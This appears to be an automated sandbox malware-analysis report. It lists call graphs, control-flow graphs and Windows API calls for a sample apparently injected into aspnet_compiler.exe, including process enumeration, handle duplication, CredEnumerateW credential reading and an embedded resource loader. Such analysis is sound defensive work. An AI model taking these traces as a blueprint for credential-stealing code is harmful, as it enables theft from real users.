40381 4165a0 11 API calls 40380->40381 40382 41660d 40381->40382 40382->40352 40383->40352 40384->40352 40385->40352 40386->40352 40387->40368 40388->40368 40389->40368 40390->40356 40391->40348 40393 438187 40392->40393 40394 438192 40392->40394 40398 4380f6 40393->40398 40394->40374 40396->40375 40397->40375 40401 43811f 40398->40401 40399 438164 40399->40394 40401->40399 40402 4300e8 3 API calls 40401->40402 40403 437e5e 40401->40403 40402->40401 40426 437d3c 40403->40426 40405 437eb3 40405->40401 40406 437ea9 40406->40405 40411 437f22 40406->40411 40441 41f432 40406->40441 40409 437f06 40488 415c56 11 API calls 40409->40488 40413 432d4e 3 API calls 40411->40413 40416 437f7f 40411->40416 40412 437f95 40489 415c56 11 API calls 40412->40489 40413->40416 40414 43802b 40417 4165ff 11 API calls 40414->40417 40416->40412 40416->40414 40418 438054 40417->40418 40452 437371 40418->40452 40421 43806b 40422 438094 40421->40422 40490 42f50e 138 API calls 40421->40490 40424 437fa3 40422->40424 40425 4300e8 3 API calls 40422->40425 40424->40405 40491 41f638 104 API calls 40424->40491 40425->40424 40427 437d69 40426->40427 40430 437d80 40426->40430 40492 437ccb 11 API calls 40427->40492 40428 437d76 40428->40406 40430->40428 40431 437da3 40430->40431 40433 437d90 40430->40433 40434 438460 134 API calls 40431->40434 40433->40428 40496 437ccb 11 API calls 40433->40496 40437 437dcb 40434->40437 40435 437de8 40495 424f26 123 API calls 40435->40495 40437->40435 40493 444283 13 API calls 40437->40493 40439 437dfc 40494 437ccb 11 API calls 40439->40494 40442 41f54d 40441->40442 40448 41f44f 40441->40448 40443 41f466 40442->40443 40526 41c635 memset memset 40442->40526 40443->40409 40443->40411 40448->40443 40450 41f50b 40448->40450 40497 41f1a5 40448->40497 40522 41c06f memcmp 40448->40522 40523 41f3b1 90 API calls 40448->40523 40524 41f398 86 API calls 40448->40524 40450->40442 40450->40443 40525 41c295 86 API calls 40450->40525 40453 41703f 11 API calls 40452->40453 40454 437399 40453->40454 40455 43739d 40454->40455 40457 4373ac 40454->40457 40527 4446ea 11 API calls 40455->40527 40458 416935 16 API calls 40457->40458 40467 4373ca 40458->40467 40459 438460 134 API calls 40459->40467 40460 4375bc 40462 415c7d 16 API calls 40460->40462 40463 4375d2 40462->40463 40465 4442e6 11 API calls 40463->40465 40484 4373a7 40463->40484 40464 4251c4 137 API calls 40464->40467 40466 4375e2 40465->40466 40466->40484 40535 444283 13 API calls 40466->40535 40467->40459 40467->40464 40469 415a91 memset 40467->40469 40472 43758f 40467->40472 40486 437584 40467->40486 40487 437d3c 135 API calls 40467->40487 40528 425433 13 API calls 40467->40528 40529 425413 17 API calls 40467->40529 40530 42533e 16 API calls 40467->40530 40531 42538f 16 API calls 40467->40531 40532 42453e 123 API calls 40467->40532 40469->40467 40533 42453e 123 API calls 40472->40533 40475 4375f4 40479 437620 40475->40479 40480 43760b 40475->40480 40476 43759f 40478 416935 16 API calls 40476->40478 40478->40486 40481 416935 16 API calls 40479->40481 40536 444283 13 API calls 40480->40536 40481->40484 40484->40421 40485 437612 memcpy 40485->40484 40486->40460 40534 42453e 123 API calls 40486->40534 40487->40467 40488->40405 40489->40424 40490->40422 40491->40405 40492->40428 40493->40439 40494->40435 40495->40428 40496->40428 40498 41bc3b 101 API calls 40497->40498 40499 41f1b4 40498->40499 40500 41edad 86 API calls 40499->40500 40517 41f282 40499->40517 40501 41f1cb 40500->40501 40502 41f1f5 memcmp 40501->40502 40503 41f20e 40501->40503 40501->40517 40502->40503 40504 41f21b memcmp 40503->40504 40503->40517 40505 41f326 40504->40505 40507 41f23d 40504->40507 40506 41ee6b 86 API calls 40505->40506 40505->40517 40506->40517 40507->40505 40508 41f28e memcmp 40507->40508 40510 41c8df 56 API calls 40507->40510 40508->40505 40509 41f2a9 40508->40509 40509->40505 40512 41f308 40509->40512 40513 41f2d8 40509->40513 40511 41f269 40510->40511 40511->40505 40515 41f287 40511->40515 40516 41f27a 40511->40516 40512->40505 40520 4446ce 11 API calls 40512->40520 40514 41ee6b 86 API calls 40513->40514 40518 41f2e0 40514->40518 40515->40508 40519 41ee6b 86 API calls 40516->40519 40517->40448 40521 41b1ca memset 40518->40521 40519->40517 40520->40505 40521->40517 40522->40448 40523->40448 40524->40448 40525->40442 40526->40443 40527->40484 40528->40467 40529->40467 40530->40467 40531->40467 40532->40467 40533->40476 40534->40460 40535->40475 40536->40485 40537 441819 40540 430737 40537->40540 40539 441825 40539->40539 40541 430756 40540->40541 40542 43076d 40540->40542 40543 430774 40541->40543 40544 43075f 40541->40544 40542->40539 40554 43034a 40543->40554 40558 4169a7 11 API calls 40544->40558 40547 430819 memset 40547->40542 40548 415b2c 11 API calls 40550 4307e9 40548->40550 40549 4307ce 40549->40547 40549->40548 40550->40542 40550->40547 40551 43077e 40551->40542 40551->40549 40552 4307fa 40551->40552 40559 4169a7 11 API calls 40552->40559 40555 43034e 40554->40555 40557 430359 40554->40557 40560 415c23 memcpy 40555->40560 40557->40551 40558->40542 40559->40542 40560->40557 40561 41493c EnumResourceNamesW

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 361 40de6e-40de71 358->361 361->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                                                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                                                                  • API String ID: 594330280-3398334509
                                                                                                                                                                                                                                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 562 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 565 413f00-413f11 Process32NextW 562->565 566 413da5-413ded OpenProcess 565->566 567 413f17-413f24 CloseHandle 565->567 568 413eb0-413eb5 566->568 569 413df3-413e26 memset call 413f27 566->569 568->565 570 413eb7-413ebd 568->570 577 413e79-413e9d call 413959 call 413ca4 569->577 578 413e28-413e35 569->578 572 413ec8-413eda call 4099f4 570->572 573 413ebf-413ec6 ??3@YAXPAX@Z 570->573 575 413edb-413ee2 572->575 573->575 582 413ee4 575->582 583 413ee7-413efe 575->583 589 413ea2-413eae CloseHandle 577->589 580 413e61-413e68 578->580 581 413e37-413e44 GetModuleHandleW 578->581 580->577 587 413e6a-413e76 580->587 581->580 586 413e46-413e5c GetProcAddress 581->586 582->583 583->565 586->580 587->577 589->568
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 912665193-1740548384
                                                                                                                                                                                                                                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                                                  • String ID: BIN
                                                                                                                                                                                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                                                    • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2947809556-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1690352074-0
                                                                                                                                                                                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                                                                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-44567b call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 59 445680-445683 21->59 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 68 4458a2-4458aa call 40b1ab 53->68 69 44587e 53->69 64 445d1c-445d25 54->64 65 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->65 70 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->70 71 445b98-445ba0 55->71 56->13 72 44582e-445847 call 40a9b5 call 4087b3 57->72 74 445685 59->74 75 4456b2-4456b5 call 40b1ab 59->75 79 445fae-445fb2 64->79 80 445d2b-445d3b 64->80 160 445cf5 65->160 161 445cfc-445d03 65->161 68->19 88 445884-44589d call 40a9b5 call 4087b3 69->88 249 445c77 70->249 71->70 73 445ba2-445bcf call 4099c6 call 445403 call 445389 71->73 142 445849 72->142 73->54 92 44568b-4456b0 call 40a9b5 call 4087b3 74->92 109 4456ba-4456c4 75->109 97 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 80->97 98 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 80->98 146 44589f 88->146 92->75 166 445d67-445d6c 97->166 167 445d71-445d83 call 445093 97->167 196 445e17 98->196 197 445e1e-445e25 98->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 139->140 140->23 142->56 146->68 154->109 155->154 157->158 158->28 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->79 171->172 172->64 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->79 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->79 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->54 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
